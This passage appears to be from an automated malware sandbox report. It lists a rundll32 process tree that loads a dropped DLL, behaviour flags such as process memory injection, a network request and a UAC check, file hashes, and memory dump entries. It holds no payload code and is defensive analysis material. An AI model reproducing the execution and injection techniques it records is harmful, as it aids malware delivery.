C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll,03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll,04⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dllMD5
e231230db7f22a3977bbfa422d84724d
SHA172788c18e5677d4f6980bdc85da0b143b7068ef3
SHA2560e05563f14300ca66f0bc35532feb92e6e0023e8bb124de7975cc1a5de97d714
SHA512cd5b2f9d0d3b18ac123532d240d5b1811d66c39d127de6bd7738ce39223a2fc81a34cab1c20e1dcd781e443aa26f4a050a36bc74b8c6aea87b2e626a598df455
-
\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dllMD5
e231230db7f22a3977bbfa422d84724d
SHA172788c18e5677d4f6980bdc85da0b143b7068ef3
SHA2560e05563f14300ca66f0bc35532feb92e6e0023e8bb124de7975cc1a5de97d714
SHA512cd5b2f9d0d3b18ac123532d240d5b1811d66c39d127de6bd7738ce39223a2fc81a34cab1c20e1dcd781e443aa26f4a050a36bc74b8c6aea87b2e626a598df455
-
memory/644-2-0x000001EA94EB0000-0x000001EA954E7000-memory.dmpFilesize
6.2MB
-
memory/644-3-0x000001EA9E7B8000-0x000001EA9E7BF000-memory.dmpFilesize
28KB
-
memory/1168-8-0x0000000000000000-mapping.dmp
-
memory/2116-9-0x0000000000000000-mapping.dmp
-
memory/2116-10-0x00007FFC29430000-0x00007FFC29E1C000-memory.dmpFilesize
9.9MB
-
memory/2116-11-0x0000018970B70000-0x0000018970B71000-memory.dmpFilesize
4KB
-
memory/2116-12-0x0000018970D20000-0x0000018970D21000-memory.dmpFilesize
4KB
-
memory/2204-15-0x0000000000000000-mapping.dmp
-
memory/2204-17-0x0000000002DC0000-0x0000000002DFD000-memory.dmpFilesize
244KB
-
memory/2300-13-0x0000000000000000-mapping.dmp